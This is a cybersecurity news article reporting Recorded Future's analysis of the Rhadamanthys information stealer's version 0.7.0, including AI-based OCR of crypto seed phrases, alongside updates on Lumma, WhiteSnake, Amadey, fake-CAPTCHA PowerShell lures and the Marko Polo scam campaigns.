The threat actors behind the Rhadamanthys information stealer have introduced advanced features, including the use of artificial intelligence (AI) for optical character recognition (OCR), which plays a key role in what’s called “Seed Phrase Image Recognition.”
"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies," said Recorded Future’s Insikt Group in an analysis of version 0.7.0 of the malware.
"The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation," they added.
First discovered in the wild in September 2022, Rhadamanthys has quickly become one of the most formidable information stealers advertised under the malware-as-a-service (MaaS) model, alongside other malicious software like Lumma.
Despite bans from underground forums like Exploit and XSS for targeting entities in Russia and former Soviet Union states, Rhadamanthys remains highly active. The developer, known as "kingcrete" or "kingcrete2022," has found alternative ways to promote the malware through platforms like Telegram, Jabber, and TOX.
The malware, sold on a subscription basis for $250 per month (or $550 for a 90-day period), enables customers to harvest a wide array of sensitive data from compromised systems. This includes system information, credentials, cryptocurrency wallets, browser passwords, cookies, and other application data. It also includes mechanisms to thwart analysis within sandbox environments.
The latest release, version 0.7.0, launched in June 2024, offers significant improvements over its predecessor (version 0.6.0 from February 2024). According to Recorded Future, "It comprises a complete rewrite of both client-side and server-side frameworks, improving the program’s execution stability. Additionally, 30 wallet-cracking algorithms, AI-powered graphics, and PDF recognition for phrase extraction were added. The text extraction capability was enhanced to identify multiple saved phrases."
One of the most concerning new features allows threat actors to run and install Microsoft Software Installer (MSI) files, helping them evade detection by security solutions. There is also a new configuration setting to prevent re-execution within a specified time frame.
A notable aspect of Rhadamanthys is its plugin system, which extends its functionality to include keylogging, cryptocurrency clippers, and reverse proxy capabilities.
"Rhadamanthys is a popular choice for cybercriminals," Recorded Future said. "Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of."
The Rhadamanthys evolution comes as Google-owned Mandiant detailed the use of custom control flow indirection by Lumma Stealer, another information-stealing malware, to complicate binary analysis.
"This technique thwarts all binary analysis tools, including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process but also automation tools designed to capture execution artifacts and generate detections," said Mandiant researchers Nino Isakovic and Chuong Dong.
Alongside Rhadamanthys and Lumma, other stealer malware families such as Meduza, StealC, Vidar, and WhiteSnake have been updating their capabilities, including bypassing Chrome's app-bound encryption to steal browser cookies.
Notably, WhiteSnake Stealer has added functionality to extract CVC codes from credit cards stored in Chrome, emphasizing how malware threats continue to evolve.
Additionally, researchers have uncovered a new Amadey malware campaign that uses an AutoIt script to open the victim's browser in kiosk mode, tricking users into entering their Google account credentials. This information is later harvested by stealers like StealC.
These new tactics also coincide with drive-by download campaigns that trick users into executing PowerShell code under the guise of CAPTCHA verification, delivering stealers like Lumma, StealC, and Vidar.
"Victims are deceived into manually launching the Run menu and executing malicious PowerShell commands," Secureworks noted. "This attack circumvents browser security controls by opening a command prompt, allowing the execution of unauthorized code on the host system."
Phishing and malvertising efforts have similarly led to the distribution of other stealers, including Atomic macOS Stealer (AMOS), Rilide, and a new variant of Snake Keylogger.
Furthermore, information stealers like Rhadamanthys, Atomic, and StealC have been involved in over 30 scam campaigns orchestrated by the cybercrime group "Marko Polo." These campaigns target cryptocurrency users and gamers through spear-phishing tactics, tricking victims by impersonating legitimate brands.
"Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media," Recorded Future added, highlighting that tens of thousands of devices globally may have been compromised.
